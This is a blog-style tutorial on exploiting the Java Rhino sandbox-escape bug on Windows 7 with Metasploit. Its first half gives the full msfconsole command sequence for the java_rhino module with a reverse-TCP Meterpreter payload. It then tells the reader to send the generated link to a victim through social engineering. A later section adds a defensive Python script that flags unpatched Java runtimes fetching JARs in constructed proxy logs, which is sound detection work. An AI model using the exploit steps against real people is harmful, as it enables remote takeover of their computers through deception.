Browser exploit series (1) JAVA Rhino exploit
Today we are going to pwn Windows 7 with a Java exploit called the JAVA RHINO exploit. Here I quote from the Armitage console's description of the exploit: "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary code outside of the sandbox." The vulnerability affects Java 7 and earlier versions, and should work on any browser: Firefox, Safari, Internet Explorer, Google Chrome etc.
First of all, you have to update Metasploit from svn with the #msfupdate command, to make sure that the above exploit is included in your BackTrack exploit database. Then run:
#msfconsole
Then type this command:
#use exploit/multi/browser/java_rhino
Then again, this command:
#set payload java/meterpreter/reverse_tcp
At this level, type these commands, the first one is meant to set up the server:
#set srvhost 192.168.1.6
In this case 192.168.1.6 is my internal IP; you have to replace this value with your own IP. If you don't know how to get your IP address, just open a terminal and type #ifconfig. The next command defines the port of the server, which is usually port 80.
#set srvport 80
The next command sets the URI path the exploit is served from, and the two after it set the host and port the reverse payload connects back to:
#set uripath java_rhino
#set lhost 192.168.1.6
#set lport 443
Notice also that srvhost and lhost have the same IP address. Finally, type this command and wait for a connection:
#exploit
As you may notice, a link has been generated for you: Local IP: http://192.168.1.6:80/java_rhino. You have to copy the link and send it to your victim. Once you succeed in "social engineering" the victim into opening the link, the payload is sent, and you'll have a Java Meterpreter session.
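Seen from the defender's side, the one fact this post gives you is that the bug lives in the Java runtime itself (Java 7 and earlier), not in any particular browser, so patch level of the Java plugin is what matters. When a browser hands an applet to the plugin, the JAR is fetched by Java's own HTTP client, which identifies itself with a "Java/1.x.y_zz" User-Agent rather than the browser's. The script below, added here as an example and not part of the original post or of Metasploit, parses a few constructed proxy-log lines, extracts the Java version from that User-Agent, and flags JAR downloads by runtimes below an assumed patched baseline (7 Update 1 and 6 Update 29 are taken from the vendor's fix for this bug; verify against the vendor advisory for your environment). The log format and all IPs and URLs are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Assumed patched baseline per major version: {major: first fixed update}.
# Anything below these, and every major older than 6, is treated as affected.
# Verify against the vendor advisory; this is an assumption, not from the post.
PATCHED_UPDATE: Dict[int, int] = {7: 1, 6: 29}

# Constructed proxy log lines (not from the post): client_ip method url "user_agent"
SAMPLE_LOG: List[str] = [
    '10.0.0.12 GET http://192.168.1.6:80/java_rhino/ "Mozilla/5.0 (Windows NT 6.1) Firefox/7.0"',
    '10.0.0.12 GET http://192.168.1.6:80/java_rhino/applet.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0"',
    '10.0.0.15 GET http://intranet.example/app/tool.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"',
    '10.0.0.20 GET http://intranet.example/app/tool.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20"',
]

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')
# Java's HTTP client UA: "Java/1.7.0_11" (legacy numbering) or "Java/11.0.2" (9 and later)
JAVA_UA_RE = re.compile(r'Java/(\d+)\.(\d+)\.\d+(?:_(\d+))?')


def parse_java_ua(user_agent: str) -> Optional[Tuple[int, int]]:
    """Return (major, update) for a Java User-Agent, or None if it is not one."""
    m = JAVA_UA_RE.search(user_agent)
    if not m:
        return None
    first, second, update = m.groups()
    if first == "1":
        # Legacy scheme: 1.7.0_11 means Java 7 Update 11; no suffix means Update 0
        return int(second), int(update or 0)
    # Modern scheme: 11.0.2 means Java 11; update levels no longer apply here
    return int(first), 0


def is_vulnerable(major: int, update: int,
                  patched: Dict[int, int] = PATCHED_UPDATE) -> bool:
    """True if the runtime is at or below the affected range (Java 7 and earlier)."""
    oldest_patched_major = min(patched)
    if major < oldest_patched_major:
        return True  # Java 5 and older never received a fix
    if major in patched:
        return update < patched[major]
    return False  # newer major than anything in the affected range


def scan_log(lines: List[str]) -> List[dict]:
    """Flag JAR fetches made by a Java runtime in the affected version range."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash the scan
        client, _method, url, ua = m.groups()
        version = parse_java_ua(ua)
        if version is None or not url.lower().endswith(".jar"):
            continue
        major, update = version
        if is_vulnerable(major, update):
            findings.append({"client": client, "url": url,
                             "java": f"{major}u{update}"})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} fetched {hit['url']} with unpatched Java {hit['java']}")
```

Two hits come out of the sample: the 7u0 client pulling a JAR from the exploit server path, and a 6u20 client pulling an internal JAR. The second is not an attack, which is the point: the alert is about the unpatched runtime, and the fix in both cases is updating Java on that host.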